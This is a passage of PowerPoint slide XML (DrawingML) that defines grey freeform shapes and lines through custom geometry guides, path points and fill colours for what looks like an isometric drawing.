                  <a:gd name="T6" fmla="*/ 0 w 1569"/>
                  <a:gd name="T7" fmla="*/ 2764 h 276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69"/>
                  <a:gd name="T13" fmla="*/ 0 h 2764"/>
                  <a:gd name="T14" fmla="*/ 1569 w 1569"/>
                  <a:gd name="T15" fmla="*/ 2764 h 276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69" h="2764">
                    <a:moveTo>
                      <a:pt x="0" y="2764"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1569" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1569" y="2343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="276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4" name="Freeform 2637"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2208" y="2778"/>
                <a:ext cx="539" cy="315"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 7396"/>
                  <a:gd name="T1" fmla="*/ 2764 h 4328"/>
                  <a:gd name="T2" fmla="*/ 1568 w 7396"/>
                  <a:gd name="T3" fmla="*/ 0 h 4328"/>
                  <a:gd name="T4" fmla="*/ 7396 w 7396"/>
                  <a:gd name="T5" fmla="*/ 1564 h 4328"/>
                  <a:gd name="T6" fmla="*/ 5827 w 7396"/>
                  <a:gd name="T7" fmla="*/ 4328 h 4328"/>
                  <a:gd name="T8" fmla="*/ 0 w 7396"/>
                  <a:gd name="T9" fmla="*/ 2764 h 43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96"/>
                  <a:gd name="T16" fmla="*/ 0 h 4328"/>
                  <a:gd name="T17" fmla="*/ 7396 w 7396"/>
                  <a:gd name="T18" fmla="*/ 4328 h 43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96" h="4328">
                    <a:moveTo>
                      <a:pt x="0" y="2764"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1568" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7396" y="1564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5827" y="4328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="276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5" name="Line 2638"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2463" y="2824"/>
                <a:ext cx="114" cy="20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6" name="Line 2639"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2378" y="2847"/>
                <a:ext cx="114" cy="20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7" name="Line 2640"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2548" y="2801"/>
                <a:ext cx="114" cy="20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8" name="Line 2641"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2292" y="2869"/>
                <a:ext cx="115" cy="20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9" name="Freeform 2642"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2437" y="3010"/>
                <a:ext cx="425" cy="358"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 5828"/>
                  <a:gd name="T1" fmla="*/ 0 h 4915"/>
                  <a:gd name="T2" fmla="*/ 0 w 5828"/>
                  <a:gd name="T3" fmla="*/ 3352 h 4915"/>
                  <a:gd name="T4" fmla="*/ 5828 w 5828"/>
                  <a:gd name="T5" fmla="*/ 4915 h 4915"/>
                  <a:gd name="T6" fmla="*/ 5828 w 5828"/>
                  <a:gd name="T7" fmla="*/ 1563 h 4915"/>
                  <a:gd name="T8" fmla="*/ 0 w 5828"/>
                  <a:gd name="T9" fmla="*/ 0 h 49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828"/>
                  <a:gd name="T16" fmla="*/ 0 h 4915"/>
                  <a:gd name="T17" fmla="*/ 5828 w 5828"/>
                  <a:gd name="T18" fmla="*/ 4915 h 49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828" h="4915">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="3352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5828" y="4915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5828" y="1563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0" name="Freeform 2643"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2322" y="2922"/>
                <a:ext cx="115" cy="202"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1575"/>
                  <a:gd name="T1" fmla="*/ 2766 h 2766"/>
                  <a:gd name="T2" fmla="*/ 1575 w 1575"/>
                  <a:gd name="T3" fmla="*/ 0 h 2766"/>
                  <a:gd name="T4" fmla="*/ 1575 w 1575"/>
                  <a:gd name="T5" fmla="*/ 2344 h 2766"/>
                  <a:gd name="T6" fmla="*/ 0 w 1575"/>
                  <a:gd name="T7" fmla="*/ 2766 h 27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75"/>
                  <a:gd name="T13" fmla="*/ 0 h 2766"/>
                  <a:gd name="T14" fmla="*/ 1575 w 1575"/>
                  <a:gd name="T15" fmla="*/ 2766 h 27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75" h="2766">
                    <a:moveTo>
                      <a:pt x="0" y="2766"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1575" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1575" y="2344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="276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1" name="Freeform 2644"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2323" y="2809"/>
                <a:ext cx="539" cy="315"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 7396"/>
                  <a:gd name="T1" fmla="*/ 2762 h 4325"/>
                  <a:gd name="T2" fmla="*/ 1569 w 7396"/>
                  <a:gd name="T3" fmla="*/ 0 h 4325"/>
                  <a:gd name="T4" fmla="*/ 7396 w 7396"/>
                  <a:gd name="T5" fmla="*/ 1562 h 4325"/>
                  <a:gd name="T6" fmla="*/ 5828 w 7396"/>
                  <a:gd name="T7" fmla="*/ 4325 h 4325"/>
                  <a:gd name="T8" fmla="*/ 0 w 7396"/>
                  <a:gd name="T9" fmla="*/ 2762 h 43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96"/>
                  <a:gd name="T16" fmla="*/ 0 h 4325"/>
                  <a:gd name="T17" fmla="*/ 7396 w 7396"/>
                  <a:gd name="T18" fmla="*/ 4325 h 43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96" h="4325">
                    <a:moveTo>
                      <a:pt x="0" y="2762"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1569" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7396" y="1562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5828" y="4325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="276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2" name="Line 2645"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2578" y="2855"/>
                <a:ext cx="114" cy="20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3" name="Line 2646"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2493" y="2878"/>
                <a:ext cx="114" cy="20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4" name="Line 2647"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2663" y="2832"/>
                <a:ext cx="114" cy="20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5" name="Line 2648"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2407" y="2900"/>
                <a:ext cx="115" cy="20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6" name="Freeform 2649"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2502" y="3170"/>
                <a:ext cx="32" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 435"/>
                  <a:gd name="T1" fmla="*/ 0 h 1063"/>
                  <a:gd name="T2" fmla="*/ 0 w 435"/>
                  <a:gd name="T3" fmla="*/ 947 h 1063"/>
                  <a:gd name="T4" fmla="*/ 435 w 435"/>
                  <a:gd name="T5" fmla="*/ 1063 h 1063"/>
                  <a:gd name="T6" fmla="*/ 435 w 435"/>
                  <a:gd name="T7" fmla="*/ 116 h 1063"/>
                  <a:gd name="T8" fmla="*/ 0 w 435"/>
                  <a:gd name="T9" fmla="*/ 0 h 10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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 1063"/>
                  <a:gd name="T17" fmla="*/ 435 w 435"/>
                  <a:gd name="T18" fmla="*/ 1063 h 10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5" h="1063">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="947"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="1063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="11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7" name="Freeform 2650"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2637" y="3134"/>
                <a:ext cx="32" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 432"/>
                  <a:gd name="T1" fmla="*/ 0 h 1063"/>
                  <a:gd name="T2" fmla="*/ 0 w 432"/>
                  <a:gd name="T3" fmla="*/ 947 h 1063"/>
                  <a:gd name="T4" fmla="*/ 432 w 432"/>
                  <a:gd name="T5" fmla="*/ 1063 h 1063"/>
                  <a:gd name="T6" fmla="*/ 432 w 432"/>
                  <a:gd name="T7" fmla="*/ 116 h 1063"/>
                  <a:gd name="T8" fmla="*/ 0 w 432"/>
                  <a:gd name="T9" fmla="*/ 0 h 10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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 1063"/>
                  <a:gd name="T17" fmla="*/ 432 w 432"/>
                  <a:gd name="T18" fmla="*/ 1063 h 10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2" h="1063">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="947"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="1063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="11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8" name="Freeform 2651"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2768" y="3099"/>
                <a:ext cx="32" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 435"/>
                  <a:gd name="T1" fmla="*/ 0 h 1063"/>
                  <a:gd name="T2" fmla="*/ 0 w 435"/>
                  <a:gd name="T3" fmla="*/ 947 h 1063"/>
                  <a:gd name="T4" fmla="*/ 435 w 435"/>
                  <a:gd name="T5" fmla="*/ 1063 h 1063"/>
                  <a:gd name="T6" fmla="*/ 435 w 435"/>
                  <a:gd name="T7" fmla="*/ 118 h 1063"/>
                  <a:gd name="T8" fmla="*/ 0 w 435"/>
                  <a:gd name="T9" fmla="*/ 0 h 10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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 1063"/>
                  <a:gd name="T17" fmla="*/ 435 w 435"/>
                  <a:gd name="T18" fmla="*/ 1063 h 10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5" h="1063">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="947"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="1063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="11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9" name="Freeform 2652"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2273" y="3185"/>
                <a:ext cx="97" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1326"/>
                  <a:gd name="T1" fmla="*/ 357 h 1907"/>
                  <a:gd name="T2" fmla="*/ 0 w 1326"/>
                  <a:gd name="T3" fmla="*/ 1543 h 1907"/>
                  <a:gd name="T4" fmla="*/ 1326 w 1326"/>
                  <a:gd name="T5" fmla="*/ 1907 h 1907"/>
                  <a:gd name="T6" fmla="*/ 1326 w 1326"/>
                  <a:gd name="T7" fmla="*/ 0 h 1907"/>
                  <a:gd name="T8" fmla="*/ 0 w 1326"/>
                  <a:gd name="T9" fmla="*/ 357 h 19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26"/>
                  <a:gd name="T16" fmla="*/ 0 h 1907"/>
                  <a:gd name="T17" fmla="*/ 1326 w 1326"/>
                  <a:gd name="T18" fmla="*/ 1907 h 190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26" h="1907">
                    <a:moveTo>
                      <a:pt x="0" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="1907"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="80808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0" name="Freeform 2653"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2273" y="3298"/>
                <a:ext cx="97" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1326 w 1326"/>
                  <a:gd name="T1" fmla="*/ 364 h 720"/>
                  <a:gd name="T2" fmla="*/ 0 w 1326"/>
                  <a:gd name="T3" fmla="*/ 0 h 720"/>
                  <a:gd name="T4" fmla="*/ 0 w 1326"/>
                  <a:gd name="T5" fmla="*/ 720 h 720"/>
                  <a:gd name="T6" fmla="*/ 1326 w 1326"/>
                  <a:gd name="T7" fmla="*/ 364 h 72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26"/>
                  <a:gd name="T13" fmla="*/ 0 h 720"/>
                  <a:gd name="T14" fmla="*/ 1326 w 1326"/>
                  <a:gd name="T15" fmla="*/ 720 h 72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26" h="720">
                    <a:moveTo>
                      <a:pt x="1326" y="364"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="364"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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1" name="Freeform 2654"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2268" y="3171"/>
                <a:ext cx="5" cy="154"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 73"/>
                  <a:gd name="T1" fmla="*/ 0 h 2126"/>
                  <a:gd name="T2" fmla="*/ 0 w 73"/>
                  <a:gd name="T3" fmla="*/ 2107 h 2126"/>
                  <a:gd name="T4" fmla="*/ 73 w 73"/>
                  <a:gd name="T5" fmla="*/ 2126 h 2126"/>
                  <a:gd name="T6" fmla="*/ 73 w 73"/>
                  <a:gd name="T7" fmla="*/ 18 h 2126"/>
                  <a:gd name="T8" fmla="*/ 0 w 73"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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2126"/>
                  <a:gd name="T17" fmla="*/ 73 w 73"/>
                  <a:gd name="T18" fmla="*/ 2126 h 21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2126">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="2107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="2126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="1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2" name="Freeform 2655"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2370" y="3199"/>
                <a:ext cx="6" cy="155"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 89"/>
                  <a:gd name="T1" fmla="*/ 0 h 2133"/>
                  <a:gd name="T2" fmla="*/ 89 w 89"/>
                  <a:gd name="T3" fmla="*/ 2107 h 2133"/>
                  <a:gd name="T4" fmla="*/ 0 w 89"/>
                  <a:gd name="T5" fmla="*/ 2133 h 2133"/>
                  <a:gd name="T6" fmla="*/ 0 w 89"/>
                  <a:gd name="T7" fmla="*/ 23 h 2133"/>
                  <a:gd name="T8" fmla="*/ 89 w 89"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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"/>
                  <a:gd name="T16" fmla="*/ 0 h 2133"/>
                  <a:gd name="T17" fmla="*/ 89 w 89"/>
                  <a:gd name="T18" fmla="*/ 2133 h 21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" h="2133">
                    <a:moveTo>
                      <a:pt x="89" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="89" y="2107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89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3" name="Freeform 2656"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2267" y="3169"/>
                <a:ext cx="1" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 2150"/>
                  <a:gd name="T2" fmla="*/ 16 w 16"/>
                  <a:gd name="T3" fmla="*/ 2107 h 2150"/>
                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                  <a:gd name="T5" fmla="*/ 2150 h 2150"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 42 h 2150"/>
                  <a:gd name="T8" fmla="*/ 16 w 16"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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"/>
                  <a:gd name="T16" fmla="*/ 0 h 2150"/>
                  <a:gd name="T17" fmla="*/ 16 w 16"/>
                  <a:gd name="T18" fmla="*/ 2150 h 21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" h="2150">
                    <a:moveTo>
                      <a:pt x="16" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="2107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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4" name="Freeform 2657"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2268" y="3184"/>
                <a:ext cx="102" cy="58"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1394"/>
                  <a:gd name="T1" fmla="*/ 373 h 794"/>
                  <a:gd name="T2" fmla="*/ 0 w 1394"/>
                  <a:gd name="T3" fmla="*/ 794 h 794"/>
                  <a:gd name="T4" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T5" fmla="*/ 420 h 794"/>
                  <a:gd name="T6" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T7" fmla="*/ 0 h 794"/>
                  <a:gd name="T8" fmla="*/ 0 w 1394"/>
                  <a:gd name="T9" fmla="*/ 373 h 7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94"/>
                  <a:gd name="T16" fmla="*/ 0 h 794"/>
                  <a:gd name="T17" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T18" fmla="*/ 794 h 79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94" h="794">
                    <a:moveTo>
                      <a:pt x="0" y="373"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="794"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1394" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1394" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37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5" name="Freeform 2658"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2268" y="3214"/>
                <a:ext cx="102" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1394"/>
                  <a:gd name="T1" fmla="*/ 376 h 711"/>
                  <a:gd name="T2" fmla="*/ 0 w 1394"/>
                  <a:gd name="T3" fmla="*/ 711 h 711"/>
                  <a:gd name="T4" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T5" fmla="*/ 338 h 711"/>
                  <a:gd name="T6" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T7" fmla="*/ 0 h 711"/>
                  <a:gd name="T8" fmla="*/ 0 w 1394"/>
                  <a:gd name="T9" fmla="*/ 376 h 7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94"/>
                  <a:gd name="T16" fmla="*/ 0 h 711"/>
                  <a:gd name="T17" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T18" fmla="*/ 711 h 7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94" h="711">
                    <a:moveTo>
                      <a:pt x="0" y="376"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1394" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1394" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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6" name="Freeform 2659"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2262" y="3170"/>
                <a:ext cx="6" cy="155"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 87 w 87"/>
                  <a:gd name="T1" fmla="*/ 0 h 2131"/>
                  <a:gd name="T2" fmla="*/ 87 w 87"/>
                  <a:gd name="T3" fmla="*/ 2107 h 2131"/>
                  <a:gd name="T4" fmla="*/ 0 w 87"/>
                  <a:gd name="T5" fmla="*/ 2131 h 2131"/>
                  <a:gd name="T6" fmla="*/ 0 w 87"/>
                  <a:gd name="T7" fmla="*/ 23 h 2131"/>
                  <a:gd name="T8" fmla="*/ 87 w 87"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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7"/>
                  <a:gd name="T16" fmla="*/ 0 h 2131"/>
                  <a:gd name="T17" fmla="*/ 87 w 87"/>
                  <a:gd name="T18" fmla="*/ 2131 h 21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7" h="2131">
                    <a:moveTo>
                      <a:pt x="87" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="87" y="2107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8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7" name="Freeform 2660"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2376" y="3199"/>
                <a:ext cx="5" cy="155"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 69"/>
                  <a:gd name="T1" fmla="*/ 0 h 2129"/>
                  <a:gd name="T2" fmla="*/ 0 w 69"/>
                  <a:gd name="T3" fmla="*/ 2110 h 2129"/>
                  <a:gd name="T4" fmla="*/ 69 w 69"/>
                  <a:gd name="T5" fmla="*/ 2129 h 2129"/>
                  <a:gd name="T6" fmla="*/ 69 w 69"/>
                  <a:gd name="T7" fmla="*/ 19 h 2129"/>
                  <a:gd name="T8" fmla="*/ 0 w 69"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 2129"/>
                  <a:gd name="T17" fmla="*/ 69 w 69"/>
                  <a:gd name="T18" fmla="*/ 2129 h 21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9" h="2129">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="2110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="2129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="19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8" name="Freeform 2661"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2262" y="3169"/>
                <a:ext cx="119" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1639 w 1639"/>
                  <a:gd name="T1" fmla="*/ 19 h 439"/>
                  <a:gd name="T2" fmla="*/ 1571 w 1639"/>
                  <a:gd name="T3" fmla="*/ 0 h 439"/>
                  <a:gd name="T4" fmla="*/ 0 w 1639"/>
                  <a:gd name="T5" fmla="*/ 420 h 439"/>
                  <a:gd name="T6" fmla="*/ 69 w 1639"/>
                  <a:gd name="T7" fmla="*/ 439 h 439"/>
                  <a:gd name="T8" fmla="*/ 1639 w 1639"/>
                  <a:gd name="T9" fmla="*/ 19 h 4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39"/>
                  <a:gd name="T16" fmla="*/ 0 h 439"/>
                  <a:gd name="T17" fmla="*/ 1639 w 1639"/>
                  <a:gd name="T18" fmla="*/ 439 h 4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39" h="439">
                    <a:moveTo>
                      <a:pt x="1639" y="19"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1639" y="1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9" name="Freeform 2662"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2268" y="3172"/>
                <a:ext cx="102" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T1" fmla="*/ 0 h 539"/>
                  <a:gd name="T2" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T3" fmla="*/ 166 h 539"/>
                  <a:gd name="T4" fmla="*/ 0 w 1394"/>
                  <a:gd name="T5" fmla="*/ 539 h 539"/>
                  <a:gd name="T6" fmla="*/ 0 w 1394"/>
                  <a:gd name="T7" fmla="*/ 374 h 539"/>
                  <a:gd name="T8" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T9" fmla="*/ 0 h 5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94"/>
                  <a:gd name="T16" fmla="*/ 0 h 539"/>
                  <a:gd name="T17" fmla="*/ 1394 w 1394"/>
                  <a:gd name="T18" fmla="*/ 539 h 5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94" h="539">
                    <a:moveTo>
                      <a:pt x="1394" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1394" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
